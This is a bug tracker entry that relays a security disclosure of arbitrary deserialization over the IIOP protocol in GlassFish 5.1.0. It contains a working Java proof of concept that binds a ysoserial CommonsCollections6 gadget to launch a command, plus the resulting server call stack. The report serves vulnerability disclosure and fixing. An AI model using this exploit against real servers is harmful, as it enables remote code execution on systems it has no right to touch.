Bug 562345 - glassfish arbitrary deserialization
Summary: glassfish arbitrary deserialization
Status: NEW
Alias: None
Product: z_Archived
Classification: Eclipse Foundation
Component: Glassfish (show other bugs)
Version: unspecified   Edit
Hardware: PC Linux
: P3 normal (vote)
Target Milestone: ---   Edit
Assignee: Project Inbox CLA
QA Contact:
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2020-04-20 15:04 EDT by Eclipse Webmaster CLA
Modified: 2022-06-01 15:58 EDT (History)
1 user (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Eclipse Webmaster CLA 2020-04-20 15:04:41 EDT 
From the security mailing list:

0x00 brief introduction
The iiop protocol can arbitrarily deserialize. I  and r00t4dm from A-TEAM of Legendsec at Qi'anxin Group  finished the research.


0x01 attack
version:glassfish-5.1.0

We use commons-collections-3.1.jar as an example.We put commons-collections-3.1.jar into glassfish5\glassfish\lib.Then we use the following code to attack.Pop up calculator on windows.


Here you need to download the ysoerial library,It will help us construct malicious objects.

poc
```java
import ysoserial.payloads.*;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Hashtable;

public class iiopEXP {

    public static void main(String[] args) throws Exception {
            Hashtable env = new Hashtable();
            //use com.sun.enterprise.naming.impl.SerialInitContextFactory
            env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.enterprise.naming.impl.SerialInitContextFactory");
            env.put(Context.PROVIDER_URL, "iiop://127.0.0.1:3700");
            Context ctx = new InitialContext(env);

            //evil gadget
            CommonsCollections6 cc6 = new CommonsCollections6();
            //bind
            ctx.bind("iswin", cc6.getObject("calc"));

    }
}

```



Call stack
```
<init>:215, ProcessBuilder (java.lang)
exec:617, Runtime (java.lang)
exec:450, Runtime (java.lang)
exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
transform:125, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:151, LazyMap (org.apache.commons.collections.map)
getValue:73, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:120, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
readObject:342, HashSet (java.util)
invokeVirtual_LL_V:-1, 2014582044 (java.lang.invoke.LambdaForm$DMH)
reinvoke:-1, 1938060362 (java.lang.invoke.LambdaForm$BMH)
invoke_MT:-1, 972344001 (java.lang.invoke.LambdaForm$MH)
invokeObjectReader:1727, IIOPInputStream (com.sun.corba.ee.impl.io)
inputObject:1109, IIOPInputStream (com.sun.corba.ee.impl.io)
simpleReadObject:313, IIOPInputStream (com.sun.corba.ee.impl.io)
readValueInternal:274, ValueHandlerImpl (com.sun.corba.ee.impl.io)
readValue:240, ValueHandlerImpl (com.sun.corba.ee.impl.io)
readRMIIIOPValueType:781, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:883, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:701, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:482, CDRInputObject (com.sun.corba.ee.impl.encoding)
unmarshalIn:252, TCUtility (com.sun.corba.ee.impl.corba)
read_value:571, AnyImpl (com.sun.corba.ee.impl.corba)
read_any:541, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_any:439, CDRInputObject (com.sun.corba.ee.impl.encoding)
readAny:372, Util (com.sun.corba.ee.impl.javax.rmi.CORBA)
read:268, DynamicMethodMarshallerImpl$10 (com.sun.corba.ee.impl.presentation.rmi)
readArguments:420, DynamicMethodMarshallerImpl (com.sun.corba.ee.impl.presentation.rmi)
_invoke:141, ReflectiveTie (com.sun.corba.ee.impl.presentation.rmi)
dispatchToServant:490, ServerRequestDispatcherImpl (com.sun.corba.ee.impl.protocol)
dispatch:161, ServerRequestDispatcherImpl (com.sun.corba.ee.impl.protocol)
handleRequestRequest:1520, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
handleRequest:1396, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
handleInput:901, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
callback:183, RequestMessage_1_2 (com.sun.corba.ee.impl.protocol.giopmsgheaders)
handleRequest:665, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
dispatch:467, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
doWork:2193, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
performWork:467, ThreadPoolImpl$WorkerThread (com.sun.corba.ee.impl.threadpool)
run:510, ThreadPoolImpl$WorkerThread (com.sun.corba.ee.impl.threadpool)